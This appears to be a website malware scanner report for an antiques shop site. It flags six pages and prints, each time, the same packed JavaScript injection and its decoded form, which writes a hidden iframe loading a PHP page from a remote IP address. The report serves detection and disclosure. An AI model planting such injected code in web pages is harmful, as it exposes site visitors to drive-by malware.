Malware Scanner report for antikfar.ru

Malicious/Suspicious/Total urls checked: 0/6/15

6 pages have suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "antikfar.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=antikfar.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://antikfar.ru/	200 OK Content-Length: 14207 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'\|var\|document\|write\|k02\|k0\|1000\|k01\|if\|setTimeout\|k22\|k2\|http\|217\|\|src\|height\|173\|width\|board\|\|144\|php\|44\|tag1\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>
http://antikfar.ru/sites/all/modules/jquery_update/replace/jquery.min.js?T	200 OK Content-Length: 57343 Content-Type: application/x-javascript	clean
http://antikfar.ru/misc/drupal.js?T	200 OK Content-Length: 9774 Content-Type: application/x-javascript	clean
http://antikfar.ru/sites/default/files/languages/ru_1a8844b70ca9bcbfa63a325366d1eba1.js?T	200 OK Content-Length: 2633 Content-Type: application/x-javascript	clean
http://antikfar.ru/sites/all/modules/google_analytics/googleanalytics.js?T	200 OK Content-Length: 2268 Content-Type: application/x-javascript	clean
http://antikfar.ru/sites/all/modules/views_slideshow/js/views_slideshow.js?T	200 OK Content-Length: 19083 Content-Type: application/x-javascript	clean
http://antikfar.ru/sites/all/modules/views_slideshow/js/jquery.cycle.all.min.js?T	404 Not Found Content-Length: 7600 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'\|var\|document\|write\|k02\|k0\|1000\|k01\|if\|setTimeout\|k22\|k2\|http\|217\|\|src\|height\|173\|width\|board\|\|144\|php\|44\|tag1\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>
http://antikfar.ru/sites/all/modules/views_slideshow_jcarouselthumbs/jcarousel/lib/jquery.jcarousel.js?T	200 OK Content-Length: 31678 Content-Type: application/x-javascript	clean
http://antikfar.ru/sites/all/modules/views_slideshow_jcarouselthumbs/views_slideshow.js?T	200 OK Content-Length: 9833 Content-Type: application/x-javascript	clean
http://antikfar.ru/contact	200 OK Content-Length: 13698 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'\|var\|document\|write\|k02\|k0\|1000\|k01\|if\|setTimeout\|k22\|k2\|http\|217\|\|src\|height\|173\|width\|board\|\|144\|php\|44\|tag1\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>
http://antikfar.ru/misc/textarea.js?T	200 OK Content-Length: 1263 Content-Type: application/x-javascript	clean
http://api-maps.yandex.ru/1.1/?key=AO5S4k0BAAAANJsoAQIA6ZXjLYw5CJlPliQxhNvxMtWbPJgAAAAAAAAAAADR5_P0v-xaoUOWlfq546s4x7WxRQ==&modules=pmap&wizard=constructor	200 OK Content-Length: 5936 Content-Type: text/javascript	clean
http://antikfar.ru/catalog/zhivopis	200 OK Content-Length: 11098 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'\|var\|document\|write\|k02\|k0\|1000\|k01\|if\|setTimeout\|k22\|k2\|http\|217\|\|src\|height\|173\|width\|board\|\|144\|php\|44\|tag1\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>
http://antikfar.ru/catalog/suveniry	200 OK Content-Length: 20676 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'\|var\|document\|write\|k02\|k0\|1000\|k01\|if\|setTimeout\|k22\|k2\|http\|217\|\|src\|height\|173\|width\|board\|\|144\|php\|44\|tag1\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>
http://antikfar.ru/catalog/farfor	200 OK Content-Length: 16088 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'\|var\|document\|write\|k02\|k0\|1000\|k01\|if\|setTimeout\|k22\|k2\|http\|217\|\|src\|height\|173\|width\|board\|\|144\|php\|44\|tag1\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: antikfar.ru

Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 08 Mar 2015 11:26:13 GMT
Server: nginx/1.7.4
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 08 Mar 2015 11:26:12 GMT
Set-Cookie: SESS8e5c46126157595298e4c70feb629c4c=nhhdaiahs55co9a3naqacs0m23; expires=Tue, 31-Mar-2015 14:59:32 GMT; path=/; domain=.antikfar.ru
X-Powered-By: PHP/5.2.17

Second query (visit from search engine):
GET / HTTP/1.1
Host: antikfar.ru
Referer: http://www.google.com/search?q=antikfar.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for antikfar.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools